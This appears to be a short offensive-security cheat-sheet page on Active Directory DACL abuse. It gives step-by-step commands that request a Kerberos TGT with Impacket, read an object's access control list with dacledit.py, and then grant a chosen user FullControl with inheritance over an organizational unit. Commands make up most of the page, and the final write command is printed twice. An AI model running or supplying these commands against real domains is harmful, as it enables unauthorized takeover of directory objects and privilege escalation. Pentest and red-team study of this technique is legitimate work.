DACL (Discretionary Access Control List) Attack
Last modified: 2023-10-22
DACL is a list of the trustees that are allowed or denied access to objects in Active Directory.
Add Rights
We may be able to take a full control of securable objects by getting GenericAll permission on OU (Organizational Unit).
1. Ask TGT for Kerberos Authentication
If we want to use Kerberos authentication for attacking DACL, we need to retrieve a TGT for specific user at first. In addition, to avoid authentication error, we need to synchronize the system time with the domain controller using ntpdate
or rdate
.
sudo ntpdate example.local
# or
sudo rdate -n example.local
impacket-getTGT -dc-ip dc.example.local example.local/username:password
The getTGT
above dumps a .ccache
file which stores TGT.
After dumping the .ccache
file, set it to an environment variable for using the later processing.
export KRB5CCNAME=username.ccache
2. Read DACL
We can use Impacket
's dacledit
which has not yet been merged as of 2023/10/21.
The repository is here: https://github.com/ShutdownRepo/impacket/tree/dacledit
dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password
# -use-ldaps: Use LDAPS instead of LDAP
# -k: Use Kerberos authentication
dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password -use-ldaps -k
3. Write DACL
dacledit.py -action write -rights 'FullControl' -principal username -target-dn'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k
# -use-ldaps: Use LDAPS instead of LDAP
# -k: Use Kerberos authentication
dacledit.py -action write -rights 'FullControl' -principal username -target-dn'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k